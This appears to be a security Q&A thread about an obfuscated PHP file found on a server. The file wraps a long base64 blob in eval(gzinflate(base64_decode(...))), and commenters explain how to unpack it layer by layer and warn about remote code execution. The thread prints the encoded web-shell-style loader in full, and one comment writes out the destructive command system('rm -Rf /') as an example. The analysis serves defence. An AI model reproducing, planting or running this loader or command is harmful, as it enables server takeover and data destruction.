I found a file named "default.php" on the server with following code
eval(gzinflate(base64_decode(
"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")));
What can be the purpose of this script.
r
is an XSS vulnerability as well. (Not like it matters when you have remote code execution) – CodesInChaos Jan 28 '13 at 10:51eval
function executes PHP code passed to it as a string. So the code takes that big base64 string, turns it back into raw binary data usingbase64_decode
, then runs that raw data throughgzinflate
, since the obfuscator originally ran the data throughgzdeflate
. So I just replaced theeval
with an echo, so it prints out the de-obfuscated string. That operation returns another blob of PHP code that looks similar, with anothereval
, but actually contains a different base64 blob. If you repeat this over and over, eventually it results in the blob of code I posted. – Polynomial Jan 28 '13 at 11:23eval
with areturn
, then evals that. It then looks at the results and checks if there's anothereval
at the start. If there is, it loops back and does another replace/eval. If there's noeval
at the start of the string, it prints the result, which gives us the final code. – Polynomial Jan 28 '13 at 11:24eval(gzinflate(base64_decode("..."))); system("rm -Rf /")
in one of those many layers (which it could, if the code to be run contains anexit
to prevent thesystem
from ever being reached). – derobert Jan 29 '13 at 20:58system
command was disabled for security reasons, and the PHP process is sandboxed. – Polynomial Jan 29 '13 at 21:49base64_decode
&gzinflate
yourself, skippingeval
entirely. – derobert Jan 29 '13 at 22:07